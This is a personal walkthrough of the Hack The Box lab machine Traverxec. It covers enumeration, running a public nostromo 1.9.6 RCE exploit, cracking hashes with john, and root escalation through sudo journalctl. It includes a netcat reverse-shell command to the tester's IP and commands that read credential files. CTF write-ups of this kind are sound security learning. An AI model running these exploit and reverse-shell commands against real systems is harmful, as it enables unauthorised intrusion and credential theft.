Hack The Box: Traverxec


Enumeration

box traver

nmap reveals 2 open ports: 22 and 80.

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 aa:99:a8:16:68💿41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
|   256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_  256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open  http    nostromo 1.9.6
|_http-title: TRAVERXEC
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port 80 shows a website:

box traver


Initial Foothold

The webserver is nostromo 1.9.6., and a quick google search reveals that it suffers from a RCE vulnerability. There is an exploit python script in the searchsploit database, so I used it and immediately got a response:

$ python2.7 ./47837.py 10.129.203.206 80 id
HTTP/1.1 200 OK
Date: Thu, 10 Nov 2022 21:27:05 GMT
Server: nostromo 1.9.6
Connection: close


uid=33(www-data) gid=33(www-data) groups=33(www-data)

Getting a reverse shell failed for me, but after a quick enumeration I found something which looked like the password hash for user david in the .htpasswd file:


$ python2.7 ./47837.py 10.129.203.206 80 "cat /var/nostromo/conf/.htpasswd"
HTTP/1.1 200 OK
Date: Thu, 10 Nov 2022 21:31:16 GMT
Server: nostromo 1.9.6
Connection: close


david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/

After some googling, I found out that this could be an extract from /etc/shadow. So I downloaded ```/etc/passwd`` as well and combined them:

$ unshadow passwd shadow > david_pw
$ john --wordlist=/usr/share/wordlists/rockyou.txt david_pw

And with this I got the password: Nowonly4me. Unfortunately this password didn’t work as SSH login for user david, so let’s try to get a proper shell as www-data first.

$ python2.7 ./47837.py 10.129.203.206 80 "/usr/bin/nc -e /bin/sh 10.10.14.31 443"

gets us a reverse shell on port 443.


At this point, I got stuck because I coudn’t find a way to use the password for user david, and also no other foothold. So I searched for some writeups and found out that I didn’t understand what the nostromo server is doing. This is what it says in the config file:

# HOMEDIRS [OPTIONAL]
homedirs                /home
homedirs_public         public_www

This is because nostromo offers the option to publish the public_www directory of a user’s home folder online. From the [nostromo documentation]:

HOMEDIRS
To serve the home directories of your users via HTTP, enable the homedirs option by defining the path in where the home directories are stored, normally /home. To access a users home directory enter a ~ in the URL followed by the home directory name like in this example:

http://www.nazgul.ch/~hacki/

The content of the home directory is handled exactly the same way as a directory in your document root. If some users don't want that their home directory can be accessed via HTTP, they shall remove the world readable flag on their home directory and a caller will receive a 403 Forbidden response. Also, if basic authentication is enabled, a user can create an .htaccess file in his home directory and a caller will need to authenticate.

You can restrict the access within the home directories to a single sub directory by defining it via the homedirs_public option.

I tried to access the homedirectory at <ip>/~/david but it was empty:

box traver

So I checked the writeup again and finally got back on track: With this, the user www-data also might have read permissions on /home/david/www-data. And this is really the case - inside the directory we can find a zip file with a password protected ssh-key. Cracking its password with john reveals the password hunter, and with this we can log in via SSH and get the user flag.


Privilege Escalation

Inside David’s home folder, we can find a script called server-status.sh which can be executed without sudo password, although the last line requires sudo permissions:

#!/bin/bash

cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat 

So it seems the user has sudo permissions for this command without password. With help of GTFO bins, we can try to modify the script in order to pop a shell for us. Unfortunately it is not possible to edit the file.

So I had to consult the walkthrough again, but actually it’s not so difficult: We can execute the command $ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service even without the context of the script. According to GTFObins, we can break out of journalctl as long as its in the context of the page viewer (most likely less). So when you shrink the terminal size to less than five lines, you get a chance to break out of the user context and get a root shell with !/bin/sh:

box traver